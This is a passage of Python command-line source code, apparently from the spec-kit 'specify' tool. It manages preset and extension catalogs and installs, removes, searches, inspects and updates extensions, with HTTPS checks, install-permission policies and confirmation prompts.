# ===== Preset Catalog Commands =====
@preset_catalog_app.command("list")
def preset_catalog_list():
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = PresetCatalog(project_root)
try:
active_catalogs = catalog.get_active_catalogs()
except PresetValidationError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
console.print("\n[bold cyan]Active Preset Catalogs:[/bold cyan]\n")
for entry in active_catalogs:
install_str = (
"[green]install allowed[/green]"
if entry.install_allowed
else "[yellow]discovery only[/yellow]"
)
console.print(f" [bold]{entry.name}[/bold] (priority {entry.priority})")
if entry.description:
console.print(f" {entry.description}")
console.print(f" URL: {entry.url}")
console.print(f" Install: {install_str}")
console.print()
config_path = project_root / ".specify" / "preset-catalogs.yml"
user_config_path = Path.home() / ".specify" / "preset-catalogs.yml"
if os.environ.get("SPECKIT_PRESET_CATALOG_URL"):
console.print("[dim]Catalog configured via SPECKIT_PRESET_CATALOG_URL environment variable.[/dim]")
else:
try:
proj_loaded = config_path.exists() and catalog._load_catalog_config(config_path) is not None
except PresetValidationError:
proj_loaded = False
if proj_loaded:
console.print(f"[dim]Config: {config_path.relative_to(project_root)}[/dim]")
else:
try:
user_loaded = user_config_path.exists() and catalog._load_catalog_config(user_config_path) is not None
except PresetValidationError:
user_loaded = False
if user_loaded:
console.print("[dim]Config: ~/.specify/preset-catalogs.yml[/dim]")
else:
console.print("[dim]Using built-in default catalog stack.[/dim]")
console.print(
"[dim]Add .specify/preset-catalogs.yml to customize.[/dim]"
)
@preset_catalog_app.command("add")
def preset_catalog_add(
url: str = typer.Argument(help="Catalog URL (must use HTTPS)"),
name: str = typer.Option(..., "--name", help="Catalog name"),
priority: int = typer.Option(10, "--priority", help="Priority (lower = higher priority)"),
install_allowed: bool = typer.Option(
False, "--install-allowed/--no-install-allowed",
help="Allow presets from this catalog to be installed",
),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
from .presets import PresetCatalog, PresetValidationError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate URL
tmp_catalog = PresetCatalog(project_root)
try:
tmp_catalog._validate_catalog_url(url)
except PresetValidationError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
config_path = specify_dir / "preset-catalogs.yml"
# Load existing config
if config_path.exists():
try:
config = yaml.safe_load(config_path.read_text()) or {}
except Exception as e:
console.print(f"[red]Error:[/red] Failed to read {config_path}: {e}")
raise typer.Exit(1)
else:
config = {}
catalogs = config.get("catalogs", [])
if not isinstance(catalogs, list):
console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
raise typer.Exit(1)
# Check for duplicate name
for existing in catalogs:
if isinstance(existing, dict) and existing.get("name") == name:
console.print(f"[yellow]Warning:[/yellow] A catalog named '{name}' already exists.")
console.print("Use 'specify preset catalog remove' first, or choose a different name.")
raise typer.Exit(1)
catalogs.append({
"name": name,
"url": url,
"priority": priority,
"install_allowed": install_allowed,
"description": description,
})
config["catalogs"] = catalogs
config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
install_label = "install allowed" if install_allowed else "discovery only"
console.print(f"\n[green]✓[/green] Added catalog '[bold]{name}[/bold]' ({install_label})")
console.print(f" URL: {url}")
console.print(f" Priority: {priority}")
console.print(f"\nConfig saved to {config_path.relative_to(project_root)}")
@preset_catalog_app.command("remove")
def preset_catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
config_path = specify_dir / "preset-catalogs.yml"
if not config_path.exists():
console.print("[red]Error:[/red] No preset catalog config found. Nothing to remove.")
raise typer.Exit(1)
try:
config = yaml.safe_load(config_path.read_text()) or {}
except Exception:
console.print("[red]Error:[/red] Failed to read preset catalog config.")
raise typer.Exit(1)
catalogs = config.get("catalogs", [])
if not isinstance(catalogs, list):
console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
raise typer.Exit(1)
original_count = len(catalogs)
catalogs = [c for c in catalogs if isinstance(c, dict) and c.get("name") != name]
if len(catalogs) == original_count:
console.print(f"[red]Error:[/red] Catalog '{name}' not found.")
raise typer.Exit(1)
config["catalogs"] = catalogs
config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
console.print(f"[green]✓[/green] Removed catalog '{name}'")
if not catalogs:
console.print("\n[dim]No catalogs remain in config. Built-in defaults will be used.[/dim]")
# ===== Extension Commands =====
def _resolve_installed_extension(
argument: str,
installed_extensions: list,
command_name: str = "command",
allow_not_found: bool = False,
) -> tuple[Optional[str], Optional[str]]:
from rich.table import Table
# First, try exact ID match
for ext in installed_extensions:
if ext["id"] == argument:
return (ext["id"], ext["name"])
# If not found by ID, try display name match
name_matches = [ext for ext in installed_extensions if ext["name"].lower() == argument.lower()]
if len(name_matches) == 1:
# Unique display-name match
return (name_matches[0]["id"], name_matches[0]["name"])
elif len(name_matches) > 1:
# Ambiguous display-name match
console.print(
f"[red]Error:[/red] Extension name '{argument}' is ambiguous. "
"Multiple installed extensions share this name:"
)
table = Table(title="Matching extensions")
table.add_column("ID", style="cyan", no_wrap=True)
table.add_column("Name", style="white")
table.add_column("Version", style="green")
for ext in name_matches:
table.add_row(ext.get("id", ""), ext.get("name", ""), str(ext.get("version", "")))
console.print(table)
console.print("\nPlease rerun using the extension ID:")
console.print(f" [bold]specify extension {command_name} <extension-id>[/bold]")
raise typer.Exit(1)
else:
# No match by ID or display name
if allow_not_found:
return (None, None)
console.print(f"[red]Error:[/red] Extension '{argument}' is not installed")
raise typer.Exit(1)
def _resolve_catalog_extension(
argument: str,
catalog,
command_name: str = "info",
) -> tuple[Optional[dict], Optional[Exception]]:
from rich.table import Table
from .extensions import ExtensionError
try:
# First try by ID
ext_info = catalog.get_extension_info(argument)
if ext_info:
return (ext_info, None)
# Try by display name - search using argument as query, then filter for exact match
search_results = catalog.search(query=argument)
name_matches = [ext for ext in search_results if ext["name"].lower() == argument.lower()]
if len(name_matches) == 1:
return (name_matches[0], None)
elif len(name_matches) > 1:
# Ambiguous display-name match in catalog
console.print(
f"[red]Error:[/red] Extension name '{argument}' is ambiguous. "
"Multiple catalog extensions share this name:"
)
table = Table(title="Matching extensions")
table.add_column("ID", style="cyan", no_wrap=True)
table.add_column("Name", style="white")
table.add_column("Version", style="green")
table.add_column("Catalog", style="dim")
for ext in name_matches:
table.add_row(
ext.get("id", ""),
ext.get("name", ""),
str(ext.get("version", "")),
ext.get("_catalog_name", ""),
)
console.print(table)
console.print("\nPlease rerun using the extension ID:")
console.print(f" [bold]specify extension {command_name} <extension-id>[/bold]")
raise typer.Exit(1)
# Not found
return (None, None)
except ExtensionError as e:
return (None, e)
@extension_app.command("list")
def extension_list(
available: bool = typer.Option(False, "--available", help="Show available extensions from catalog"),
all_extensions: bool = typer.Option(False, "--all", help="Show both installed and available"),
):
from .extensions import ExtensionManager
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
installed = manager.list_installed()
if not installed and not (available or all_extensions):
console.print("[yellow]No extensions installed.[/yellow]")
console.print("\nInstall an extension with:")
console.print(" specify extension add <extension-name>")
return
if installed:
console.print("\n[bold cyan]Installed Extensions:[/bold cyan]\n")
for ext in installed:
status_icon = "✓" if ext["enabled"] else "✗"
status_color = "green" if ext["enabled"] else "red"
console.print(f" [{status_color}]{status_icon}[/{status_color}] [bold]{ext['name']}[/bold] (v{ext['version']})")
console.print(f" [dim]{ext['id']}[/dim]")
console.print(f" {ext['description']}")
console.print(f" Commands: {ext['command_count']} | Hooks: {ext['hook_count']} | Priority: {ext['priority']} | Status: {'Enabled' if ext['enabled'] else 'Disabled'}")
console.print()
if available or all_extensions:
console.print("\nInstall an extension:")
console.print(" [cyan]specify extension add <name>[/cyan]")
@catalog_app.command("list")
def catalog_list():
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = ExtensionCatalog(project_root)
try:
active_catalogs = catalog.get_active_catalogs()
except ValidationError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
console.print("\n[bold cyan]Active Extension Catalogs:[/bold cyan]\n")
for entry in active_catalogs:
install_str = (
"[green]install allowed[/green]"
if entry.install_allowed
else "[yellow]discovery only[/yellow]"
)
console.print(f" [bold]{entry.name}[/bold] (priority {entry.priority})")
if entry.description:
console.print(f" {entry.description}")
console.print(f" URL: {entry.url}")
console.print(f" Install: {install_str}")
console.print()
config_path = project_root / ".specify" / "extension-catalogs.yml"
user_config_path = Path.home() / ".specify" / "extension-catalogs.yml"
if os.environ.get("SPECKIT_CATALOG_URL"):
console.print("[dim]Catalog configured via SPECKIT_CATALOG_URL environment variable.[/dim]")
else:
try:
proj_loaded = config_path.exists() and catalog._load_catalog_config(config_path) is not None
except ValidationError:
proj_loaded = False
if proj_loaded:
console.print(f"[dim]Config: {config_path.relative_to(project_root)}[/dim]")
else:
try:
user_loaded = user_config_path.exists() and catalog._load_catalog_config(user_config_path) is not None
except ValidationError:
user_loaded = False
if user_loaded:
console.print("[dim]Config: ~/.specify/extension-catalogs.yml[/dim]")
else:
console.print("[dim]Using built-in default catalog stack.[/dim]")
console.print(
"[dim]Add .specify/extension-catalogs.yml to customize.[/dim]"
)
@catalog_app.command("add")
def catalog_add(
url: str = typer.Argument(help="Catalog URL (must use HTTPS)"),
name: str = typer.Option(..., "--name", help="Catalog name"),
priority: int = typer.Option(10, "--priority", help="Priority (lower = higher priority)"),
install_allowed: bool = typer.Option(
False, "--install-allowed/--no-install-allowed",
help="Allow extensions from this catalog to be installed",
),
description: str = typer.Option("", "--description", help="Description of the catalog"),
):
from .extensions import ExtensionCatalog, ValidationError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate URL
tmp_catalog = ExtensionCatalog(project_root)
try:
tmp_catalog._validate_catalog_url(url)
except ValidationError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
config_path = specify_dir / "extension-catalogs.yml"
# Load existing config
if config_path.exists():
try:
config = yaml.safe_load(config_path.read_text()) or {}
except Exception as e:
console.print(f"[red]Error:[/red] Failed to read {config_path}: {e}")
raise typer.Exit(1)
else:
config = {}
catalogs = config.get("catalogs", [])
if not isinstance(catalogs, list):
console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
raise typer.Exit(1)
# Check for duplicate name
for existing in catalogs:
if isinstance(existing, dict) and existing.get("name") == name:
console.print(f"[yellow]Warning:[/yellow] A catalog named '{name}' already exists.")
console.print("Use 'specify extension catalog remove' first, or choose a different name.")
raise typer.Exit(1)
catalogs.append({
"name": name,
"url": url,
"priority": priority,
"install_allowed": install_allowed,
"description": description,
})
config["catalogs"] = catalogs
config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
install_label = "install allowed" if install_allowed else "discovery only"
console.print(f"\n[green]✓[/green] Added catalog '[bold]{name}[/bold]' ({install_label})")
console.print(f" URL: {url}")
console.print(f" Priority: {priority}")
console.print(f"\nConfig saved to {config_path.relative_to(project_root)}")
@catalog_app.command("remove")
def catalog_remove(
name: str = typer.Argument(help="Catalog name to remove"),
):
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
config_path = specify_dir / "extension-catalogs.yml"
if not config_path.exists():
console.print("[red]Error:[/red] No catalog config found. Nothing to remove.")
raise typer.Exit(1)
try:
config = yaml.safe_load(config_path.read_text()) or {}
except Exception:
console.print("[red]Error:[/red] Failed to read catalog config.")
raise typer.Exit(1)
catalogs = config.get("catalogs", [])
if not isinstance(catalogs, list):
console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
raise typer.Exit(1)
original_count = len(catalogs)
catalogs = [c for c in catalogs if isinstance(c, dict) and c.get("name") != name]
if len(catalogs) == original_count:
console.print(f"[red]Error:[/red] Catalog '{name}' not found.")
raise typer.Exit(1)
config["catalogs"] = catalogs
config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
console.print(f"[green]✓[/green] Removed catalog '{name}'")
if not catalogs:
console.print("\n[dim]No catalogs remain in config. Built-in defaults will be used.[/dim]")
@extension_app.command("add")
def extension_add(
extension: str = typer.Argument(help="Extension name or path"),
dev: bool = typer.Option(False, "--dev", help="Install from local directory"),
from_url: Optional[str] = typer.Option(None, "--from", help="Install from custom URL"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
from .extensions import ExtensionManager, ExtensionCatalog, ExtensionError, ValidationError, CompatibilityError
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate priority
if priority < 1:
console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
speckit_version = get_speckit_version()
try:
with console.status(f"[cyan]Installing extension: {extension}[/cyan]"):
if dev:
# Install from local directory
source_path = Path(extension).expanduser().resolve()
if not source_path.exists():
console.print(f"[red]Error:[/red] Directory not found: {source_path}")
raise typer.Exit(1)
if not (source_path / "extension.yml").exists():
console.print(f"[red]Error:[/red] No extension.yml found in {source_path}")
raise typer.Exit(1)
manifest = manager.install_from_directory(source_path, speckit_version, priority=priority)
elif from_url:
# Install from URL (ZIP file)
import urllib.request
import urllib.error
from urllib.parse import urlparse
# Validate URL
parsed = urlparse(from_url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
console.print("[red]Error:[/red] URL must use HTTPS for security.")
console.print("HTTP is only allowed for localhost URLs.")
raise typer.Exit(1)
# Warn about untrusted sources
console.print("[yellow]Warning:[/yellow] Installing from external URL.")
console.print("Only install extensions from sources you trust.\n")
console.print(f"Downloading from {from_url}...")
# Download ZIP to temp location
download_dir = project_root / ".specify" / "extensions" / ".cache" / "downloads"
download_dir.mkdir(parents=True, exist_ok=True)
zip_path = download_dir / f"{extension}-url-download.zip"
try:
with urllib.request.urlopen(from_url, timeout=60) as response:
zip_data = response.read()
zip_path.write_bytes(zip_data)
# Install from downloaded ZIP
manifest = manager.install_from_zip(zip_path, speckit_version, priority=priority)
except urllib.error.URLError as e:
console.print(f"[red]Error:[/red] Failed to download from {from_url}: {e}")
raise typer.Exit(1)
finally:
# Clean up downloaded ZIP
if zip_path.exists():
zip_path.unlink()
else:
# Install from catalog
catalog = ExtensionCatalog(project_root)
# Check if extension exists in catalog (supports both ID and display name)
ext_info, catalog_error = _resolve_catalog_extension(extension, catalog, "add")
if catalog_error:
console.print(f"[red]Error:[/red] Could not query extension catalog: {catalog_error}")
raise typer.Exit(1)
if not ext_info:
console.print(f"[red]Error:[/red] Extension '{extension}' not found in catalog")
console.print("\nSearch available extensions:")
console.print(" specify extension search")
raise typer.Exit(1)
# Enforce install_allowed policy
if not ext_info.get("_install_allowed", True):
catalog_name = ext_info.get("_catalog_name", "community")
console.print(
f"[red]Error:[/red] '{extension}' is available in the "
f"'{catalog_name}' catalog but installation is not allowed from that catalog."
)
console.print(
f"\nTo enable installation, add '{extension}' to an approved catalog "
f"(install_allowed: true) in .specify/extension-catalogs.yml."
)
raise typer.Exit(1)
# Download extension ZIP (use resolved ID, not original argument which may be display name)
extension_id = ext_info['id']
console.print(f"Downloading {ext_info['name']} v{ext_info.get('version', 'unknown')}...")
zip_path = catalog.download_extension(extension_id)
try:
# Install from downloaded ZIP
manifest = manager.install_from_zip(zip_path, speckit_version, priority=priority)
finally:
# Clean up downloaded ZIP
if zip_path.exists():
zip_path.unlink()
console.print("\n[green]✓[/green] Extension installed successfully!")
console.print(f"\n[bold]{manifest.name}[/bold] (v{manifest.version})")
console.print(f" {manifest.description}")
console.print("\n[bold cyan]Provided commands:[/bold cyan]")
for cmd in manifest.commands:
console.print(f" • {cmd['name']} - {cmd.get('description', '')}")
console.print("\n[yellow]⚠[/yellow] Configuration may be required")
console.print(f" Check: .specify/extensions/{manifest.id}/")
except ValidationError as e:
console.print(f"\n[red]Validation Error:[/red] {e}")
raise typer.Exit(1)
except CompatibilityError as e:
console.print(f"\n[red]Compatibility Error:[/red] {e}")
raise typer.Exit(1)
except ExtensionError as e:
console.print(f"\n[red]Error:[/red] {e}")
raise typer.Exit(1)
@extension_app.command("remove")
def extension_remove(
extension: str = typer.Argument(help="Extension ID or name to remove"),
keep_config: bool = typer.Option(False, "--keep-config", help="Don't remove config files"),
force: bool = typer.Option(False, "--force", help="Skip confirmation"),
):
from .extensions import ExtensionManager
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
# Resolve extension ID from argument (handles ambiguous names)
installed = manager.list_installed()
extension_id, display_name = _resolve_installed_extension(extension, installed, "remove")
# Get extension info for command count
ext_manifest = manager.get_extension(extension_id)
cmd_count = len(ext_manifest.commands) if ext_manifest else 0
# Confirm removal
if not force:
console.print("\n[yellow]⚠ This will remove:[/yellow]")
console.print(f" • {cmd_count} commands from AI agent")
console.print(f" • Extension directory: .specify/extensions/{extension_id}/")
if not keep_config:
console.print(" • Config files (will be backed up)")
console.print()
confirm = typer.confirm("Continue?")
if not confirm:
console.print("Cancelled")
raise typer.Exit(0)
# Remove extension
success = manager.remove(extension_id, keep_config=keep_config)
if success:
console.print(f"\n[green]✓[/green] Extension '{display_name}' removed successfully")
if keep_config:
console.print(f"\nConfig files preserved in .specify/extensions/{extension_id}/")
else:
console.print(f"\nConfig files backed up to .specify/extensions/.backup/{extension_id}/")
console.print(f"\nTo reinstall: specify extension add {extension_id}")
else:
console.print("[red]Error:[/red] Failed to remove extension")
raise typer.Exit(1)
@extension_app.command("search")
def extension_search(
query: str = typer.Argument(None, help="Search query (optional)"),
tag: Optional[str] = typer.Option(None, "--tag", help="Filter by tag"),
author: Optional[str] = typer.Option(None, "--author", help="Filter by author"),
verified: bool = typer.Option(False, "--verified", help="Show only verified extensions"),
):
from .extensions import ExtensionCatalog, ExtensionError
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = ExtensionCatalog(project_root)
try:
console.print("🔍 Searching extension catalog...")
results = catalog.search(query=query, tag=tag, author=author, verified_only=verified)
if not results:
console.print("\n[yellow]No extensions found matching criteria[/yellow]")
if query or tag or author or verified:
console.print("\nTry:")
console.print(" • Broader search terms")
console.print(" • Remove filters")
console.print(" • specify extension search (show all)")
raise typer.Exit(0)
console.print(f"\n[green]Found {len(results)} extension(s):[/green]\n")
for ext in results:
# Extension header
verified_badge = " [green]✓ Verified[/green]" if ext.get("verified") else ""
console.print(f"[bold]{ext['name']}[/bold] (v{ext['version']}){verified_badge}")
console.print(f" {ext['description']}")
# Metadata
console.print(f"\n [dim]Author:[/dim] {ext.get('author', 'Unknown')}")
if ext.get('tags'):
tags_str = ", ".join(ext['tags'])
console.print(f" [dim]Tags:[/dim] {tags_str}")
# Source catalog
catalog_name = ext.get("_catalog_name", "")
install_allowed = ext.get("_install_allowed", True)
if catalog_name:
if install_allowed:
console.print(f" [dim]Catalog:[/dim] {catalog_name}")
else:
console.print(f" [dim]Catalog:[/dim] {catalog_name} [yellow](discovery only — not installable)[/yellow]")
# Stats
stats = []
if ext.get('downloads') is not None:
stats.append(f"Downloads: {ext['downloads']:,}")
if ext.get('stars') is not None:
stats.append(f"Stars: {ext['stars']}")
if stats:
console.print(f" [dim]{' | '.join(stats)}[/dim]")
# Links
if ext.get('repository'):
console.print(f" [dim]Repository:[/dim] {ext['repository']}")
# Install command (show warning if not installable)
if install_allowed:
console.print(f"\n [cyan]Install:[/cyan] specify extension add {ext['id']}")
else:
console.print(f"\n [yellow]⚠[/yellow] Not directly installable from '{catalog_name}'.")
console.print(
f" Add to an approved catalog with install_allowed: true, "
f"or install from a ZIP URL: specify extension add {ext['id']} --from <zip-url>"
)
console.print()
except ExtensionError as e:
console.print(f"\n[red]Error:[/red] {e}")
console.print("\nTip: The catalog may be temporarily unavailable. Try again later.")
raise typer.Exit(1)
@extension_app.command("info")
def extension_info(
extension: str = typer.Argument(help="Extension ID or name"),
):
from .extensions import ExtensionCatalog, ExtensionManager, normalize_priority
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = ExtensionCatalog(project_root)
manager = ExtensionManager(project_root)
installed = manager.list_installed()
# Try to resolve from installed extensions first (by ID or name)
# Use allow_not_found=True since the extension may be catalog-only
resolved_installed_id, resolved_installed_name = _resolve_installed_extension(
extension, installed, "info", allow_not_found=True
)
# Try catalog lookup (with error handling)
# If we resolved an installed extension by display name, use its ID for catalog lookup
# to ensure we get the correct catalog entry (not a different extension with same name)
lookup_key = resolved_installed_id if resolved_installed_id else extension
ext_info, catalog_error = _resolve_catalog_extension(lookup_key, catalog, "info")
# Case 1: Found in catalog - show full catalog info
if ext_info:
_print_extension_info(ext_info, manager)
return
# Case 2: Installed locally but catalog lookup failed or not in catalog
if resolved_installed_id:
# Get local manifest info
ext_manifest = manager.get_extension(resolved_installed_id)
metadata = manager.registry.get(resolved_installed_id)
metadata_is_dict = isinstance(metadata, dict)
if not metadata_is_dict:
console.print(
"[yellow]Warning:[/yellow] Extension metadata appears to be corrupted; "
"some information may be unavailable."
)
version = metadata.get("version", "unknown") if metadata_is_dict else "unknown"
console.print(f"\n[bold]{resolved_installed_name}[/bold] (v{version})")
console.print(f"ID: {resolved_installed_id}")
console.print()
if ext_manifest:
console.print(f"{ext_manifest.description}")
console.print()
# Author is optional in extension.yml, safely retrieve it
author = ext_manifest.data.get("extension", {}).get("author")
if author:
console.print(f"[dim]Author:[/dim] {author}")
console.print()
if ext_manifest.commands:
console.print("[bold]Commands:[/bold]")
for cmd in ext_manifest.commands:
console.print(f" • {cmd['name']}: {cmd.get('description', '')}")
console.print()
# Show catalog status
if catalog_error:
console.print(f"[yellow]Catalog unavailable:[/yellow] {catalog_error}")
console.print("[dim]Note: Using locally installed extension; catalog info could not be verified.[/dim]")
else:
console.print("[yellow]Note:[/yellow] Not found in catalog (custom/local extension)")
console.print()
console.print("[green]✓ Installed[/green]")
priority = normalize_priority(metadata.get("priority") if metadata_is_dict else None)
console.print(f"[dim]Priority:[/dim] {priority}")
console.print(f"\nTo remove: specify extension remove {resolved_installed_id}")
return
# Case 3: Not found anywhere
if catalog_error:
console.print(f"[red]Error:[/red] Could not query extension catalog: {catalog_error}")
console.print("\nTry again when online, or use the extension ID directly.")
else:
console.print(f"[red]Error:[/red] Extension '{extension}' not found")
console.print("\nTry: specify extension search")
raise typer.Exit(1)
def _print_extension_info(ext_info: dict, manager):
from .extensions import normalize_priority
# Header
verified_badge = " [green]✓ Verified[/green]" if ext_info.get("verified") else ""
console.print(f"\n[bold]{ext_info['name']}[/bold] (v{ext_info['version']}){verified_badge}")
console.print(f"ID: {ext_info['id']}")
console.print()
# Description
console.print(f"{ext_info['description']}")
console.print()
# Author and License
console.print(f"[dim]Author:[/dim] {ext_info.get('author', 'Unknown')}")
console.print(f"[dim]License:[/dim] {ext_info.get('license', 'Unknown')}")
# Source catalog
if ext_info.get("_catalog_name"):
install_allowed = ext_info.get("_install_allowed", True)
install_note = "" if install_allowed else " [yellow](discovery only)[/yellow]"
console.print(f"[dim]Source catalog:[/dim] {ext_info['_catalog_name']}{install_note}")
console.print()
# Requirements
if ext_info.get('requires'):
console.print("[bold]Requirements:[/bold]")
reqs = ext_info['requires']
if reqs.get('speckit_version'):
console.print(f" • Spec Kit: {reqs['speckit_version']}")
if reqs.get('tools'):
for tool in reqs['tools']:
tool_name = tool['name']
tool_version = tool.get('version', 'any')
required = " (required)" if tool.get('required') else " (optional)"
console.print(f" • {tool_name}: {tool_version}{required}")
console.print()
# Provides
if ext_info.get('provides'):
console.print("[bold]Provides:[/bold]")
provides = ext_info['provides']
if provides.get('commands'):
console.print(f" • Commands: {provides['commands']}")
if provides.get('hooks'):
console.print(f" • Hooks: {provides['hooks']}")
console.print()
# Tags
if ext_info.get('tags'):
tags_str = ", ".join(ext_info['tags'])
console.print(f"[bold]Tags:[/bold] {tags_str}")
console.print()
# Statistics
stats = []
if ext_info.get('downloads') is not None:
stats.append(f"Downloads: {ext_info['downloads']:,}")
if ext_info.get('stars') is not None:
stats.append(f"Stars: {ext_info['stars']}")
if stats:
console.print(f"[bold]Statistics:[/bold] {' | '.join(stats)}")
console.print()
# Links
console.print("[bold]Links:[/bold]")
if ext_info.get('repository'):
console.print(f" • Repository: {ext_info['repository']}")
if ext_info.get('homepage'):
console.print(f" • Homepage: {ext_info['homepage']}")
if ext_info.get('documentation'):
console.print(f" • Documentation: {ext_info['documentation']}")
if ext_info.get('changelog'):
console.print(f" • Changelog: {ext_info['changelog']}")
console.print()
# Installation status and command
is_installed = manager.registry.is_installed(ext_info['id'])
install_allowed = ext_info.get("_install_allowed", True)
if is_installed:
console.print("[green]✓ Installed[/green]")
metadata = manager.registry.get(ext_info['id'])
priority = normalize_priority(metadata.get("priority") if isinstance(metadata, dict) else None)
console.print(f"[dim]Priority:[/dim] {priority}")
console.print(f"\nTo remove: specify extension remove {ext_info['id']}")
elif install_allowed:
console.print("[yellow]Not installed[/yellow]")
console.print(f"\n[cyan]Install:[/cyan] specify extension add {ext_info['id']}")
else:
catalog_name = ext_info.get("_catalog_name", "community")
console.print("[yellow]Not installed[/yellow]")
console.print(
f"\n[yellow]⚠[/yellow] '{ext_info['id']}' is available in the '{catalog_name}' catalog "
f"but not in your approved catalog. Add it to .specify/extension-catalogs.yml "
f"with install_allowed: true to enable installation."
)
@extension_app.command("update")
def extension_update(
extension: str = typer.Argument(None, help="Extension ID or name to update (or all)"),
):
from .extensions import (
ExtensionManager,
ExtensionCatalog,
ExtensionError,
ValidationError,
CommandRegistrar,
HookExecutor,
normalize_priority,
)
from packaging import version as pkg_version
import shutil
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = ExtensionManager(project_root)
catalog = ExtensionCatalog(project_root)
speckit_version = get_speckit_version()
try:
# Get list of extensions to update
installed = manager.list_installed()
if extension:
# Update specific extension - resolve ID from argument (handles ambiguous names)
extension_id, _ = _resolve_installed_extension(extension, installed, "update")
extensions_to_update = [extension_id]
else:
# Update all extensions
extensions_to_update = [ext["id"] for ext in installed]
if not extensions_to_update:
console.print("[yellow]No extensions installed[/yellow]")
raise typer.Exit(0)
console.print("🔄 Checking for updates...\n")
updates_available = []
for ext_id in extensions_to_update:
# Get installed version
metadata = manager.registry.get(ext_id)
if metadata is None or not isinstance(metadata, dict) or "version" not in metadata:
console.print(f"⚠ {ext_id}: Registry entry corrupted or missing (skipping)")
continue
try:
installed_version = pkg_version.Version(metadata["version"])
except pkg_version.InvalidVersion:
console.print(
f"⚠ {ext_id}: Invalid installed version '{metadata.get('version')}' in registry (skipping)"
)
continue
# Get catalog info
ext_info = catalog.get_extension_info(ext_id)
if not ext_info:
console.print(f"⚠ {ext_id}: Not found in catalog (skipping)")
continue
# Check if installation is allowed from this catalog
if not ext_info.get("_install_allowed", True):
console.print(f"⚠ {ext_id}: Updates not allowed from '{ext_info.get('_catalog_name', 'catalog')}' (skipping)")
continue
try:
catalog_version = pkg_version.Version(ext_info["version"])
except pkg_version.InvalidVersion:
console.print(
f"⚠ {ext_id}: Invalid catalog version '{ext_info.get('version')}' (skipping)"
)
continue
if catalog_version > installed_version:
updates_available.append(
{
"id": ext_id,
"name": ext_info.get("name", ext_id), # Display name for status messages
"installed": str(installed_version),
"available": str(catalog_version),
"download_url": ext_info.get("download_url"),
}
)
else:
console.print(f"✓ {ext_id}: Up to date (v{installed_version})")
if not updates_available:
console.print("\n[green]All extensions are up to date![/green]")
raise typer.Exit(0)
# Show available updates
console.print("\n[bold]Updates available:[/bold]\n")
for update in updates_available:
console.print(
f" • {update['id']}: {update['installed']} → {update['available']}"
)
console.print()
confirm = typer.confirm("Update these extensions?")
if not confirm:
console.print("Cancelled")
raise typer.Exit(0)
